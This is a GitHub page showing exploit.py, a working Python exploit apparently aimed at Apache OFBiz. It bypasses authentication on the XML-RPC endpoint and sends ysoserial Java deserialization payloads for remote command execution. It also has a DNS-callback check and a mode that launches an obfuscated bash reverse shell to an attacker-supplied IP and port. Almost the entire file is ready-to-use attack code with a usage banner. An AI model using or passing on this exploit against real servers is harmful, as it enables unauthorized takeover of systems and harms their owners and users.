-
Notifications
You must be signed in to change notification settings - Fork 13
/
exploit.py
155 lines (133 loc) · 5.26 KB
/
exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
# This exploit has been written by Abdelhameed Ghazy
# Twitter : https://twitter.com/abd0ghazy
# https://www.linkedin.com/in/abdelhameed-ghazy-1a50b619a/
import requests, sys, subprocess,base64,urllib3,os
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
headers = {
'Content-Type': 'application/xml'
}
def rce(url,arg):
try:
payload=subprocess.check_output(["java","-jar","ysoserial-all.jar","CommonsBeanutils1",arg])
except:
sys.exit("""
Command didn't executed, please make sure you have java binary v11
this exploit tested on this env
openjdk version "11.0.17" 2022-10-18
OpenJDK Runtime Environment (build 11.0.17+8-post-Debian-2)
OpenJDK 64-Bit Server VM (build 11.0.17+8-post-Debian-2, mixed mode, sharing)
""")
base64_payload=base64.b64encode(payload).decode()
xml_data = '''<?xml version="1.0"?>
<methodCall>
<methodName>RCE-Test</methodName>
<params>
<param>
<value>
<struct>
<member>
<name>rce</name>
<value>
<serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">
%s
</serializable>
</value>
</member>
</struct>
</value>
</param>
</params>
</methodCall>
'''%base64_payload
r=requests.post(url+"webtools/control/xmlrpc;/?USERNAME=Y&PASSWORD=Y&requirePasswordChange=Y",data=xml_data,headers=headers,verify=False)
if "java.lang.reflect.InvocationTargetException" in r.text:
print("Exploit Completed Successfully !")
else:
print("Not Sure Worked or not ")
def dns(url,arg):
try:
payload=subprocess.check_output(["java","-jar","ysoserial-all.jar","URLDNS",arg])
except:
sys.exit("""
Command didn't executed, please make sure you have java binary v11
this exploit tested on this env
openjdk version "11.0.17" 2022-10-18
OpenJDK Runtime Environment (build 11.0.17+8-post-Debian-2)
OpenJDK 64-Bit Server VM (build 11.0.17+8-post-Debian-2, mixed mode, sharing)
""")
base64_payload=base64.b64encode(payload).decode()
xml_data = '''<?xml version="1.0"?>
<methodCall>
<methodName>Dns</methodName>
<params>
<param>
<value>
<struct>
<member>
<name>rce</name>
<value>
<serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">
%s
</serializable>
</value>
</member>
</struct>
</value>
</param>
</params>
</methodCall>
'''%base64_payload
r=requests.post(url+"webtools/control/xmlrpc;/?USERNAME=Y&PASSWORD=Y&requirePasswordChange=Y",data=xml_data,headers=headers,verify=False)
if "No such service" in r.text:
print("Exploit Completed Successfully !")
else:
print("Not Sure Worked or not ")
def shell(url,arg):
try:
ip=arg.split(":")[0]
port=int(arg.split(":")[1])
rev_shell_command="bash -i >& /dev/tcp/{ip}/{port} 0>&1".format(ip=ip,port=port)
encoded_rev_shell_command=base64.b64encode(rev_shell_command.encode()).decode()
rev_shell1='bash -c echo${IFS}%s|base64${IFS}-d|bash'%encoded_rev_shell_command
rce(url,rev_shell1)
except:
sys.exit("Please make sure from data")
def main():
if not len(sys.argv) > 3:
sys.exit("""
Usage:
python3 exploit.py target_url rce command
python3 exploit.py target_url dns dns_url
python3 exploit.py target_url shell ip:port
""")
if not os.path.exists("ysoserial-all.jar"):
sys.exit("ysoserial-all.jar file must be in the same directory")
target_url=str(sys.argv[1])
action=str(sys.argv[2])
arg=str(sys.argv[3])
if not target_url.endswith("/"):
target_url=target_url+"/"
if not target_url.startswith("http://") and not target_url.startswith("https://"):
sys.exit("""
Please Enter a Valid target_url
Ex: https://example.com
""")
if action == "rce":
rce(target_url,arg)
elif action == "dns":
if not arg.startswith("http://") and not arg.startswith("https://"):
sys.exit("""
Please Enter a Valid dns url
Ex: https://example.com
""")
dns(target_url,arg)
elif action == "shell":
shell(target_url,arg)
else:
sys.exit("""
Usage:
python3 exploit.py target_url rce command
python3 exploit.py target_url dns dns_url
python3 exploit.py target_url shell ip:port
""")
main()